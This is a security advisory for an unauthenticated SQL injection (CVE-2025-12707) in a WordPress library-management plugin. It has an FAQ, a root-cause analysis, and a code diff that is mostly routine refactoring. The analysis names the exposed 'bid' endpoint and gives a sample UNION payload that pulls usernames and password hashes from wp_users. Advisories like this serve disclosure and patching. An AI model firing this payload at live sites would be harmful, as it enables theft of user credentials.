What is CVE-2025-12707?

CVE-2025-12707 is a high-severity SQL Injection vulnerability found in the Library Management System plugin for WordPress, affecting versions up to and including 3.2.1. It allows unauthenticated attackers to inject arbitrary SQL commands through the ‘bid’ parameter, potentially leading to sensitive data exposure.

How does the SQL Injection work?

The vulnerability occurs due to insufficient input validation in the SQL query that handles the ‘bid’ parameter. Attackers can craft a malicious payload to append SQL commands, which the application executes, allowing them to retrieve sensitive information from the database.

Who is affected by this vulnerability?

Any WordPress site using the Library Management System plugin version 3.2.1 or earlier is at risk. Administrators should check their plugin version and update if they are using a vulnerable version.

How can I check if my site is vulnerable?

To check if your site is vulnerable, log into your WordPress admin panel, navigate to the Plugins section, and verify the version of the Library Management System plugin. If it is 3.2.1 or lower, your site is vulnerable.

How can I fix the vulnerability?

The vulnerability is patched in version 3.3 of the Library Management System plugin. Administrators should update to this version or later to mitigate the risk of exploitation.

What are the practical risks of this vulnerability?

The CVSS score of 7.5 indicates a high severity level, meaning that successful exploitation can lead to complete database compromise. Attackers could access sensitive user information, including credentials and personal data, without needing authentication.

What is the significance of the CVSS score?

The CVSS score provides a standardized way to assess the severity of vulnerabilities. A score of 7.5 indicates a high risk, suggesting that the vulnerability could lead to significant data breaches and requires immediate attention from site administrators.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can exploit the vulnerability by sending a specially crafted HTTP GET request with a malicious ‘bid’ parameter. This request can extract sensitive information from the database, demonstrating the risk posed by the vulnerability.

What are the consequences of exploitation?

If exploited, attackers can extract sensitive data such as user credentials and library records, leading to data breaches and potential unauthorized access to the site. This can have serious implications for user privacy and site integrity.

Is there any way to mitigate the risk if I cannot update immediately?

If immediate updates are not possible, consider disabling the Library Management System plugin until you can apply the patch. Additionally, review your site’s security settings and monitor for unusual activity in your database.

How does insufficient input validation lead to SQL Injection?

Insufficient input validation allows user-supplied data to be directly included in SQL queries without proper sanitization. This enables attackers to manipulate the query structure, injecting malicious SQL commands that the database executes.

What steps should I take after updating the plugin?

After updating the plugin, monitor your site for any unusual activity and review your security practices. Regularly update all plugins and themes, and consider implementing additional security measures such as web application firewalls.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-12707: Library Management System <= 3.2.1 – Unauthenticated SQL Injection (library-management-system)

CVE ID CVE-2025-12707

Plugin library-management-system

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 3.2.1

Patched Version 3.3

Disclosed February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-12707:
This vulnerability is an unauthenticated SQL injection in the Library Management System WordPress plugin versions up to and including 3.2.1. The vulnerability exists in the public-facing book preview functionality, allowing attackers to inject arbitrary SQL commands via the ‘bid’ parameter. The CVSS score of 7.5 reflects a high-severity information disclosure risk.

The root cause is insufficient input validation and lack of prepared statements in the `owt7_library_public_books_preview` function within the `library-management-system/public/class-library-management-system-public.php` file. The function directly concatenates user-controlled input from the `bid` GET parameter into an SQL query without proper sanitization. The vulnerable code at line 17 executes `$wpdb->get_row(“SELECT * FROM {$this->booksTable} WHERE id = ‘”.base64_decode($_GET[‘bid’]).”‘”);`. This uses `base64_decode` on the raw user input but fails to escape the decoded value before inserting it into the SQL string.

Exploitation occurs via a direct HTTP GET request to the public book preview endpoint. Attackers craft a malicious `bid` parameter containing a base64-encoded SQL injection payload. The endpoint `/wp-library-books/` is publicly accessible without authentication. A typical payload would encode a UNION-based SQL injection string, such as `’ UNION SELECT user_login,user_pass FROM wp_users–`, after base64 encoding. The attacker sends this payload as the `bid` parameter value to extract sensitive database information.

The patch addresses the vulnerability by implementing proper SQL query preparation using WordPress’s `$wpdb->prepare` method. The fixed code at line 17 changes to `$wpdb->get_row($wpdb->prepare(“SELECT * FROM {$this->booksTable} WHERE id = %s”, base64_decode($_GET[‘bid’])));`. This modification ensures the user-supplied value is properly escaped and treated as a string parameter rather than being directly concatenated into the query. The patch also updates constant references from `LIBRARY_MANAGEMENT_SYSTEM_PLUGIN_DIR_PATH` to `LIBMNS_PLUGIN_DIR_PATH` throughout the codebase.

Successful exploitation allows complete compromise of the WordPress database. Attackers can extract sensitive information including user credentials, personal data, library records, and potentially gain administrative access. The vulnerability enables data exfiltration, privilege escalation, and complete database disclosure. Since the attack requires no authentication, it presents a significant risk to any site running the vulnerable plugin version.

Differential between vulnerable and patched code

Code Diff

--- a/library-management-system/admin/class-library-management-system-admin.php
+++ b/library-management-system/admin/class-library-management-system-admin.php
@@ -1,5 +1,14 @@
 <?php
-// Initialize WP_Filesystem
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+
 if ( ! function_exists( 'WP_Filesystem' ) ) {
 	require_once( ABSPATH . 'wp-admin/includes/file.php' );
 }
@@ -8,48 +17,11 @@
 if ( ! WP_Filesystem( $creds ) ) {
 	return false;
 }
-/**
- * The admin-specific functionality of the plugin.
- *
- * @link       https://onlinewebtutorblog.com/
- * @since      3.0
- *
- * @package    Library_Management_System
- * @subpackage Library_Management_System/admin
- */
-
-/**
- * The admin-specific functionality of the plugin.
- *
- * Defines the plugin name, version, and two examples hooks for how to
- * enqueue the admin-specific stylesheet and JavaScript.
- *
- * @package    Library_Management_System
- * @subpackage Library_Management_System/admin
- * @author     Online Web Tutor <onlinewebtutorhub@gmail.com>
- */
 class Library_Management_System_Admin {

-    /**
-     * The ID of this plugin.
-     *
-     * @since    3.0
-     * @access   private
-     * @var      string    $plugin_name    The ID of this plugin.
-     */
     private $plugin_name;
-
     private $table_activator;
-
-    /**
-     * The version of this plugin.
-     *
-     * @since    3.0
-     * @access   private
-     * @var      string    $version    The current version of this plugin.
-     */
     private $version;
-
 	private $usersTable;
 	private $branchTable;
 	private $bookcaseTable;
@@ -60,21 +32,13 @@
 	private $booksReturnTable;
 	private $booksLateFineTable;

-    /**
-     * Initialize the class and set its properties.
-     *
-     * @since    3.0
-     * @param      string    $plugin_name       The name of this plugin.
-     * @param      string    $version           The version of this plugin.
-     */
     public function __construct( $plugin_name, $version ) {
         $this->plugin_name = $plugin_name;
         $this->version = $version;

-        require_once LIBRARY_MANAGEMENT_SYSTEM_PLUGIN_DIR_PATH . 'includes/class-library-management-system-activator.php';
+        require_once LIBMNS_PLUGIN_DIR_PATH . 'includes/class-library-management-system-activator.php';
         $this->table_activator = new Library_Management_System_Activator();

-		// All Tables Object
 		$this->usersTable = $this->table_activator->owt7_library_tbl_users();
 		$this->branchTable = $this->table_activator->owt7_library_tbl_branch();
 		$this->bookcaseTable = $this->table_activator->owt7_library_tbl_bookcase();
@@ -86,11 +50,6 @@
 		$this->booksLateFineTable = $this->table_activator->owt7_library_tbl_book_late_fine();
     }

-    /**
-     * Register the stylesheets for the admin area.
-     *
-     * @since    3.0
-     */
     public function enqueue_styles() {
         wp_enqueue_style( "owt7-lms-table-css", plugin_dir_url( __FILE__ ) . 'css/jquery.dataTables.min.css', array(), $this->version, 'all' );
         wp_enqueue_style( "owt7-lms-table-buttons-css", plugin_dir_url( __FILE__ ) . 'css/buttons.dataTables.min.css', array(), $this->version, 'all' );
@@ -98,11 +57,6 @@
         wp_enqueue_style( $this->plugin_name, plugin_dir_url( __FILE__ ) . 'css/library-management-system-admin.css', array(), time(), 'all' );
     }

-    /**
-     * Register the JavaScript for the admin area.
-     *
-     * @since    3.0
-     */
     public function enqueue_scripts() {
         wp_enqueue_script( "owt7-lms-validate", plugin_dir_url( __FILE__ ) . 'js/jquery.validate.min.js', array( 'jquery' ), $this->version, false );
         wp_enqueue_script( "owt7-lms-toastr", plugin_dir_url( __FILE__ ) . 'js/toastr.min.js', array( 'jquery' ), $this->version, false );
@@ -137,7 +91,6 @@
         ));
     }

-    // Register Plugin Menus and Submenus
     public function owt7_library_management_menus() {
         // Main menu
         add_menu_page(__('Library Management', 'library-management-system'), __('Library Management', 'library-management-system'), 'manage_options', 'library_management_system', array($this, 'owt7_library_management_dashboard_page'), 'dashicons-book-alt', 67);
@@ -153,16 +106,14 @@
         add_submenu_page('library_management_system', __('Upgrade to Pro', 'library-management-system'), __('Upgrade to Pro', 'library-management-system'), 'manage_options', 'owt7_library_addons', array($this, 'owt7_library_management_addons_page'));
     }

-    // Add Documentation and Settings link To Plugin
     public function owt7_add_plugin_action_links($links) {
-        $settings_link = '<a href="admin.php?page=owt7_library_settings">Settings</a>';
+        $settings_link = '<a href="admin.php?page=owt7_library_settings">' . esc_html__('Settings', 'library-management-system') . '</a>';
         $links[] = $settings_link;
-        $doc_link = '<a href="' . LIBRARY_FREE_VERSION_DOC_LINK . '" target="_blank">Documentation</a>';
+        $doc_link = '<a href="' . LIBMNS_FREE_VERSION_DOC_LINK . '" target="_blank">Documentation</a>';
         $links[] = $doc_link;
         return $links;
     }

-	// Helper function to clean escaped text
 	function owt7_clean_text($value) {
 		$value = sanitize_text_field(trim($value));
 		$value = stripslashes_deep($value);
@@ -171,12 +122,10 @@
 		return $value;
 	}

-    // Callback: "Dashboard"
     public function owt7_library_management_dashboard_page() {
         $this->owt7_library_include_template_file("", "owt7_library_dashboard");
     }

-    // Callback: "Branch and Users"
 	public function owt7_library_management_manage_users_page() {
 		global $wpdb;

@@ -312,7 +261,6 @@
 	}


-	// Callback: "Bookcase and Sections"
 	public function owt7_library_management_manage_bookcase_page() {

 		global $wpdb;
@@ -728,9 +676,9 @@
 		$params = $lib_params;

 		if ( ! empty( $mod ) ) {
-			include_once LIBRARY_MANAGEMENT_SYSTEM_PLUGIN_DIR_PATH . "admin/views/{$mod}/" . $template . '.php';
+			include_once LIBMNS_PLUGIN_DIR_PATH . "admin/views/{$mod}/" . $template . '.php';
 		} else {
-			include_once LIBRARY_MANAGEMENT_SYSTEM_PLUGIN_DIR_PATH . 'admin/views/' . $template . '.php';
+			include_once LIBMNS_PLUGIN_DIR_PATH . 'admin/views/' . $template . '.php';
 		}

 		$template = ob_get_contents();
@@ -781,7 +729,7 @@
 		$limited_credits = [ 'categories', 'bookcases', 'branches' ];

 		if ( ! empty( $type ) && in_array( $type, $limited_credits ) ) {
-			$credit = base64_decode( LMS_FREE_VERSION_LIMIT );
+			$credit = base64_decode( LIBMNS_FREE_VERSION_LIMIT );
 			$credit = intval( $credit - 10 );
 			if ( count( $data ) < $credit ) {
 				return true;
@@ -789,7 +737,7 @@
 				return false;
 			}
 		} else {
-			if ( count( $data ) < base64_decode( LMS_FREE_VERSION_LIMIT ) ) {
+			if ( count( $data ) < base64_decode( LIBMNS_FREE_VERSION_LIMIT ) ) {
 				return true;
 			} else {
 				return false;
@@ -2121,7 +2069,7 @@
 							ob_start();
 							// Template Variables
 							$params['borrows'] = $borrows;
-							include_once LIBRARY_MANAGEMENT_SYSTEM_PLUGIN_DIR_PATH . 'admin/views/transactions/templates/owt7_library_borrow_list.php';
+							include_once LIBMNS_PLUGIN_DIR_PATH . 'admin/views/transactions/templates/owt7_library_borrow_list.php';
 							$template = ob_get_contents();
 							ob_end_clean();
 							// Output
@@ -2144,7 +2092,7 @@
 							ob_start();
 							// Template Variables
 							$params['returns'] = $returns;
-							include_once LIBRARY_MANAGEMENT_SYSTEM_PLUGIN_DIR_PATH . 'admin/views/transactions/templates/owt7_library_return_list.php';
+							include_once LIBMNS_PLUGIN_DIR_PATH . 'admin/views/transactions/templates/owt7_library_return_list.php';
 							$template = ob_get_contents();
 							ob_end_clean();
 							// Output
@@ -2303,7 +2251,7 @@
 					$params[$module] = ${$module};

 					ob_start();
-					include_once LIBRARY_MANAGEMENT_SYSTEM_PLUGIN_DIR_PATH . "admin/views/{$module_folder}/templates/owt7_library_{$module}_list.php";
+					include_once LIBMNS_PLUGIN_DIR_PATH . "admin/views/{$module_folder}/templates/owt7_library_{$module}_list.php";
 					$template = ob_get_contents();
 					ob_end_clean();

@@ -2339,7 +2287,7 @@
 					$wpdb->query( "TRUNCATE TABLE {$table}" );
 				}

-				$directory = LIBRARY_MANAGEMENT_SYSTEM_PLUGIN_DIR_PATH . 'admin/sample-data';
+				$directory = LIBMNS_PLUGIN_DIR_PATH . 'admin/sample-data';
 				$files = array_diff( scandir( $directory ), [ '..', '.' ] );

 				$import_status = false;
@@ -2369,7 +2317,7 @@
 							if ( ! empty( $csv_data ) ) {

 								$table_name = '';
-								$credit = base64_decode( LMS_FREE_VERSION_LIMIT );
+								$credit = base64_decode( LIBMNS_FREE_VERSION_LIMIT );

 								if ( $file_name == 'categories' ) {
 									$csv_data = array_slice( $csv_data, 0, ( $credit - 10 ) );
--- a/library-management-system/admin/partials/library-management-system-admin-display.php
+++ b/library-management-system/admin/partials/library-management-system-admin-display.php
@@ -1,15 +1,12 @@
 <?php
-
 /**
- * Provide a admin area view for the plugin
- *
- * This file is used to markup the admin-facing aspects of the plugin.
- *
- * @link       https://onlinewebtutorblog.com/
- * @since      3.0
- *
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
  * @package    Library_Management_System
- * @subpackage Library_Management_System/admin/partials
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
  */
 ?>

--- a/library-management-system/admin/views/bookcases/owt7_library_add_bookcase.php
+++ b/library-management-system/admin/views/bookcases/owt7_library_add_bookcase.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">
     <div class="owt7_library_add_bookcase">

--- a/library-management-system/admin/views/bookcases/owt7_library_add_section.php
+++ b/library-management-system/admin/views/bookcases/owt7_library_add_section.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">

     <div class="owt7_library_add_section">
--- a/library-management-system/admin/views/bookcases/owt7_library_bookcases.php
+++ b/library-management-system/admin/views/bookcases/owt7_library_bookcases.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">

     <div class="owt7_library_list_bookcases">
@@ -11,9 +22,9 @@
                 // Generate the nonce for the actions
                 $page_nonce = wp_create_nonce('owt7_manage_bookcase_page_nonce');
             ?>
-                <a href="admin.php?page=owt7_library_bookcases&mod=bookcase&fn=add&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><?php esc_html_e("Add New Bookcase", "library-management-system"); ?></a>
-                <a href="admin.php?page=owt7_library_bookcases&mod=section&fn=list&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><?php esc_html_e("List Section", "library-management-system"); ?></a>
-                <a href="admin.php?page=owt7_library_bookcases&mod=section&fn=add&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><?php esc_html_e("Add New Section", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_bookcases&mod=bookcase&fn=add&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><span class="dashicons dashicons-archive"></span> <?php esc_html_e("Add New Bookcase", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_bookcases&mod=section&fn=list&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><span class="dashicons dashicons-list-view"></span> <?php esc_html_e("List Section", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_bookcases&mod=section&fn=add&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><span class="dashicons dashicons-plus-alt"></span> <?php esc_html_e("Add New Section", "library-management-system"); ?></a>
             </div>
         </div>

@@ -58,16 +69,16 @@
                                     <td>
                                         <a href="<?php echo esc_url(admin_url('admin.php?page=owt7_library_bookcases&mod=bookcase&fn=add&opt=view&id=' . base64_encode($bookcase->id))); ?>&_wpnonce=<?php echo esc_attr($page_nonce); ?>"
                                             title='<?php esc_attr_e("View", "library-management-system"); ?>' class="action-btn view-btn">
-                                            <span class="dashicons dashicons-visibility"></span>
+
                                         </a>
                                         <a href="<?php echo esc_url(admin_url('admin.php?page=owt7_library_bookcases&mod=bookcase&fn=add&opt=edit&id=' . base64_encode($bookcase->id))); ?>&_wpnonce=<?php echo esc_attr($page_nonce); ?>"
                                             title='<?php esc_attr_e("Edit", "library-management-system"); ?>' class="action-btn edit-btn">
-                                            <span class="dashicons dashicons-edit"></span>
+
                                         </a>
                                         <a href="javascript:void(0);" title='<?php esc_attr_e("Delete", "library-management-system"); ?>' class="action-btn delete-btn action-btn-delete"
                                             data-id="<?php echo esc_attr(base64_encode($bookcase->id)); ?>"
                                             data-module="<?php echo esc_attr(base64_encode('bookcase')); ?>">
-                                            <span class="dashicons dashicons-trash"></span>
+
                                         </a>
                                     </td>
                                 </tr>
--- a/library-management-system/admin/views/bookcases/owt7_library_list_section.php
+++ b/library-management-system/admin/views/bookcases/owt7_library_list_section.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">

     <div class="owt7_library_list_sections">
@@ -54,7 +65,7 @@
                 <tbody>
                 <?php
                     ob_start();
-                    include_once LIBRARY_MANAGEMENT_SYSTEM_PLUGIN_DIR_PATH . 'admin/views/bookcases/templates/owt7_library_sections_list.php';
+                    include_once LIBMNS_PLUGIN_DIR_PATH . 'admin/views/bookcases/templates/owt7_library_sections_list.php';
                     $template = ob_get_contents();
                     ob_end_clean();
                     echo $template;
--- a/library-management-system/admin/views/bookcases/templates/owt7_library_sections_list.php
+++ b/library-management-system/admin/views/bookcases/templates/owt7_library_sections_list.php
@@ -1,4 +1,13 @@
-<?php
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */

 if (!empty($params['sections']) && is_array($params['sections'])) {
     foreach ($params['sections'] as $section) {
@@ -40,19 +49,19 @@
                 <a href="admin.php?page=owt7_library_bookcases&mod=section&fn=add&opt=view&id=<?php echo $encoded_id; ?>"
                    title="<?php _e('View', 'library-management-system'); ?>"
                    class="action-btn view-btn">
-                    <span class="dashicons dashicons-visibility"></span>
+
                 </a>
                 <a href="admin.php?page=owt7_library_bookcases&mod=section&fn=add&opt=edit&id=<?php echo $encoded_id; ?>"
                    title="<?php _e('Edit', 'library-management-system'); ?>"
                    class="action-btn edit-btn">
-                    <span class="dashicons dashicons-edit"></span>
+
                 </a>
                 <a href="javascript:void(0);"
                    title="<?php _e('Delete', 'library-management-system'); ?>"
                    class="action-btn delete-btn action-btn-delete"
                    data-id="<?php echo $encoded_id; ?>"
                    data-module="<?php echo esc_attr(base64_encode('section')); ?>">
-                    <span class="dashicons dashicons-trash"></span>
+
                 </a>
             </td>
         </tr>
--- a/library-management-system/admin/views/books/owt7_library_add_book.php
+++ b/library-management-system/admin/views/books/owt7_library_add_book.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">

     <div class="owt7_library_add_book">
@@ -9,9 +20,9 @@
                 // Generate the nonce for the actions
                 $page_nonce = wp_create_nonce('owt7_manage_books_page_nonce');
             ?>
-                <a href="admin.php?page=owt7_library_books&mod=category&fn=add&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><?php esc_html_e("Add New Category", "library-management-system"); ?></a>
-                <a href="admin.php?page=owt7_library_books&mod=category&fn=list&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><?php esc_html_e("List Category", "library-management-system"); ?></a>
-                <a href="admin.php?page=owt7_library_books" class="btn"><?php esc_html_e("List Book", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_books&mod=category&fn=add&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><span class="dashicons dashicons-plus-alt"></span> <?php esc_html_e("Add New Category", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_books&mod=category&fn=list&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><span class="dashicons dashicons-list-view"></span> <?php esc_html_e("List Category", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_books" class="btn"><span class="dashicons dashicons-book-alt"></span> <?php esc_html_e("List Book", "library-management-system"); ?></a>
                 <?php
                 // Show Preview button only when editing
                 if (isset($_GET['opt']) && $_GET['opt'] === 'edit' && !empty($_GET['id'])) {
@@ -20,7 +31,7 @@
                         $preview_url = home_url('wp-library-books/?bid=' . base64_encode($book_id));
                         ?>
                         <a href="<?php echo esc_url($preview_url); ?>" target="_blank" class="btn btn-preview">
-                            <?php esc_html_e("Preview Book", "library-management-system"); ?>
+                             <?php esc_html_e("Preview Book", "library-management-system"); ?>
                         </a>
                         <?php
                     }
@@ -32,8 +43,8 @@
         <div class="page-container">

             <div class="page-title">
-                <?php if(isset($params['action'])){ ?> <h2><?php esc_attr(ucfirst($params['action'])." Book", "library-management-system"); ?></h2>
-                <?php }else{ ?> <h2><?php esc_html_e("Add Book", "library-management-system"); ?></h2> <?php } ?>
+                <?php if(isset($params['action'])){ ?> <h2><?php echo esc_attr(ucfirst($params['action'])." Book", "library-management-system"); ?></h2>
+                <?php } else{ ?> <h2><?php esc_html_e("Add Book", "library-management-system"); ?></h2> <?php } ?>
             </div>

             <form class="owt7_lms_book_form" id="owt7_lms_book_form" action="javascript:void(0);" method="post">
@@ -44,10 +55,7 @@
                 <?php
                 if(isset($params['action']) && $params['action'] == 'edit'){
                     ?>
-                <div class="form-row buttons-group">
-                    <input type="hidden" name="edit_id"
-                        value="<?php echo isset($params['book']['id']) ? esc_attr($params['book']['id']) : ''; ?>">
-                </div>
+                <input type="hidden" name="edit_id" value="<?php echo isset($params['book']['id']) ? esc_attr($params['book']['id']) : ''; ?>">
                 <?php
                 }
                 ?>
@@ -238,10 +246,10 @@
                                     ?> <img src="<?php echo esc_attr($params['book']['cover_image']); ?>"
                             id="owt7_library_image_preview" /> <?php
                                 }else{
-                                    ?> <img src="<?php echo esc_url(LIBRARY_MANAGEMENT_SYSTEM_PLUGIN_URL . 'admin/images/default-cover-image.png'); ?>" id="owt7_library_image_preview" /> <?php
+                                    ?> <img src="<?php echo esc_url(LIBMNS_PLUGIN_URL . 'admin/images/default-cover-image.png'); ?>" id="owt7_library_image_preview" /> <?php
                                 }
                         ?>
-                        <input type="hidden" value="<?php echo isset($params['book']['cover_image']) ? esc_attr($params['book']['cover_image']) : esc_url(LIBRARY_MANAGEMENT_SYSTEM_PLUGIN_URL) . 'admin/images/default-cover-image.png'; ?>" name="owt7_cover_image" id="owt7_image_url" />
+                        <input type="hidden" value="<?php echo isset($params['book']['cover_image']) ? esc_attr($params['book']['cover_image']) : esc_url(LIBMNS_PLUGIN_URL) . 'admin/images/default-cover-image.png'; ?>" name="owt7_cover_image" id="owt7_image_url" />
                     </div>

                     <!-- Status -->
--- a/library-management-system/admin/views/books/owt7_library_add_category.php
+++ b/library-management-system/admin/views/books/owt7_library_add_category.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">

     <div class="owt7_library_add_category">
@@ -9,9 +20,9 @@
                 // Generate the nonce for the actions
                 $page_nonce = wp_create_nonce('owt7_manage_books_page_nonce');
             ?>
-                <a href="admin.php?page=owt7_library_books&mod=category&fn=list&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><?php esc_html_e("List Category", "library-management-system"); ?></a>
-                <a href="admin.php?page=owt7_library_books&mod=book&fn=add&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><?php esc_html_e("Add New Book", "library-management-system"); ?></a>
-                <a href="admin.php?page=owt7_library_books" class="btn"><?php esc_html_e("List Book", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_books&mod=category&fn=list&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><span class="dashicons dashicons-list-view"></span> <?php esc_html_e("List Category", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_books&mod=book&fn=add&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><span class="dashicons dashicons-plus"></span> <?php esc_html_e("Add New Book", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_books" class="btn"><span class="dashicons dashicons-book"></span> <?php esc_html_e("List Book", "library-management-system"); ?></a>
             </div>
         </div>

--- a/library-management-system/admin/views/books/owt7_library_books.php
+++ b/library-management-system/admin/views/books/owt7_library_books.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">

     <div class="owt7_library_list_books">
@@ -12,9 +23,9 @@
                 // Generate the nonce for the actions
                 $page_nonce = wp_create_nonce('owt7_manage_books_page_nonce');
             ?>
-                <a href="admin.php?page=owt7_library_books&mod=category&fn=add&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><?php esc_html_e("Add New Category", "library-management-system"); ?></a>
-                <a href="admin.php?page=owt7_library_books&mod=category&fn=list&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><?php esc_html_e("List Category", "library-management-system"); ?></a>
-                <a href="admin.php?page=owt7_library_books&mod=book&fn=add&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><?php esc_html_e("Add New Book", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_books&mod=category&fn=add&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><span class="dashicons dashicons-plus-alt"></span> <?php esc_html_e("Add New Category", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_books&mod=category&fn=list&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><span class="dashicons dashicons-list-view"></span> <?php esc_html_e("List Category", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_books&mod=book&fn=add&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><span class="dashicons dashicons-book-alt"></span> <?php esc_html_e("Add New Book", "library-management-system"); ?></a>
             </div>
         </div>

@@ -27,8 +38,7 @@
             <div class="filter-container">
                 <label for="owt7_lms_category_filter"><?php esc_html_e("Filter by:", "library-management-system"); ?></label>
                 <select data-module="books" data-filter-by="category" id="owt7_lms_data_filter" class="owt7_lms_data_filter">
-                    <option value=""><?php esc_html_e("-- Select Category --", "library-management-system"); ?></option>
-                    <option value="all"><?php esc_html_e("-- All --", "library-management-system"); ?></option>
+                    <option value="all"><?php esc_html_e("All", "library-management-system"); ?></option>
                     <?php
                     if(!empty($params['categories']) && is_array($params['categories'])){
                         foreach($params['categories'] as $category){
@@ -55,7 +65,7 @@
                 <tbody>
                     <?php
                         ob_start();
-                        include_once LIBRARY_MANAGEMENT_SYSTEM_PLUGIN_DIR_PATH . 'admin/views/books/templates/owt7_library_books_list.php';
+                        include_once LIBMNS_PLUGIN_DIR_PATH . 'admin/views/books/templates/owt7_library_books_list.php';
                         $template = ob_get_contents();
                         ob_end_clean();
                         echo $template;
--- a/library-management-system/admin/views/books/owt7_library_list_category.php
+++ b/library-management-system/admin/views/books/owt7_library_list_category.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">

     <div class="owt7_library_list_categories">
@@ -12,9 +23,9 @@
                 // Generate the nonce for the actions
                 $page_nonce = wp_create_nonce('owt7_manage_books_page_nonce');
             ?>
